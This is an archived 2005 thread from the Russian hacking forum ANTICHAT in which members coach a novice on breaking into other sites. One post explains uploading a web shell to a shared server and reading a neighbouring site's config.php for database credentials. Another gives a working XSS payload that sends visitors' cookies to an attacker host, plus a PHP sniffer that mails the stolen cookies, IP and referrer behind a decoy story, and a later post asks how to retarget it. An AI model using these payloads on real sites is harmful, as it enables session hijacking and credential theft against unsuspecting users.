ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

04.12.2005, 01:11
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме: 5957900
Репутация:
561
|
|
>>> форум читать буду очень долго
Долго, но полезно :-)
А насчёт ссылочки - ну не описывается это всё нигде в одной теме + от многих вещей зависит.
Это же всё-таки не инструкция к микроволновой печке. 
Последний раз редактировалось Azazel; 04.12.2005 в 01:13..
|
|
|

04.12.2005, 01:30
|
|
Banned
Регистрация: 27.11.2005
Сообщений: 18
Провел на форуме: 75754
Репутация:
1
|
|
ехххх... ну и на том спасибо... хотя для человека который всего неделю назад узнал что такое експлойт и что такое командная строка - слишком много иноформации ((((
|
|
|

04.12.2005, 03:51
|
|
Banned
Регистрация: 27.11.2005
Сообщений: 18
Провел на форуме: 75754
Репутация:
1
|
|
2Azazel
мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?
|
|
|

04.12.2005, 12:42
|
|
Постоянный
Регистрация: 21.09.2005
Сообщений: 525
Провел на форуме: 2994394
Репутация:
547
|
|
Сообщение от Danya
2Azazel
мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?
Правильно...Тока в админке можна и хеши посмотреть на юзерей...
|
|
|

04.12.2005, 12:50
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме: 5957900
Репутация:
561
|
|
Сообщение от Danya
2Azazel
мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?
Правильно, правильно: хэши и соль от паролей можно посмотреть. А так, толку от XSS на вторых версиях по моему мало.
|
|
|

06.12.2005, 18:46
|
|
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме: 292656
Репутация:
22
|
|
это называется атака через соседа,помню в каком то номере журнала хакер была такая тема =).
|
|
|

08.12.2005, 03:21
|
|
Banned
Регистрация: 27.11.2005
Сообщений: 18
Провел на форуме: 75754
Репутация:
1
|
|
через шелл не пробовала и не буду. чтобы получить доступ к базе, надо хотябы знать ее название, рута и пасс...короче инахх (((
Последний раз редактировалось Azazel; 08.12.2005 в 03:40..
|
|
|

08.12.2005, 03:41
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме: 5957900
Репутация:
561
|
|
Зря ты так. Заливаем шелл на тот же сервак. Выполняем комманду pwd
Получаем примерно /my/seycas/na/site/111/www/html/
Потом пишем cat /my/seycas/na/site/222/www/html/config.php и получаем то что ты хочешь знать.
Теоретически - это сработает. Практически, зависит от сервера.
|
|
|

08.12.2005, 08:18
|
|
Новичок
Регистрация: 13.11.2005
Сообщений: 1
Провел на форуме: 5871
Репутация:
0
|
|
как делал я
Если форум поддерживает закачку html фаиликов к топикам то простой выход это - создаем топик(с максимально популярной темой) внутри которого находиться строчка типа: <script language=JavaScript>document.location.href="http://www.vash_server.ru/test.php?"+document.cookie</script>
затем заливаем на сервак который указали: фаилик test.php(c интересной историей например):
<?php
if(isset($QUERY_STRING));
{
$date=date('d.m.y:H:i:s');
mail("ваше@мыло.ru","New Coookie","Date and Time:$date\nIP:$REMOTE_ADDR\nAdress:$HTTP_REFERER\ nCookie:$QUERY_STRING");
}
header('Content-Type=text/html\n\n\n\n');
echo "<html><head><meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1251\"><title>story</title></head><body><pre>" .
"Есть у меня друг Костя, большой любитель представительниц женского пола.\n" .
"Если мы шли гулять и Костя не трахнул новую девушку - то вечер считался\n" .
"прожитым зря. И вот однажды на дискотеке Костя встретил ЕЁ. ОНА была\n" .
"достаточно симпатичной особой, к тому же, как и Костя, разведенной.\n" .
"Спустя месяц Костя сообщил мне, что собирается на НЕЙ жениться. Мало\n" .
"того, он сообщил, что \"завязал\", что уже давно не ходит по барам и\n" .
"вообще больше \"баб не цепляет\".\n" .
" \n" .
"Гоша Севастопольский" .
"</pre></body></html>";
?>
в результате на мыло приходят cookies с хешами паролей )) просто и сердито.
Естественно удача тут очень сильно влияет
Последний раз редактировалось Alias; 08.12.2005 в 08:33..
|
|
|

09.12.2005, 08:44
|
|
Постоянный
Регистрация: 24.10.2005
Сообщений: 343
Провел на форуме: 3175190
Репутация:
134
|
|
Помоги(те) полажуйста ! Если адрес снифера http://antichat.org/s/tyui.gif ,то как будет выглядеть эта строка
<scriptlanguage=JavaScript>document.location.href= "http://www.vash_server.ru/test.php?"+document.cookie</script>
Последний раз редактировалось Гаврила; 10.12.2005 в 08:07..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|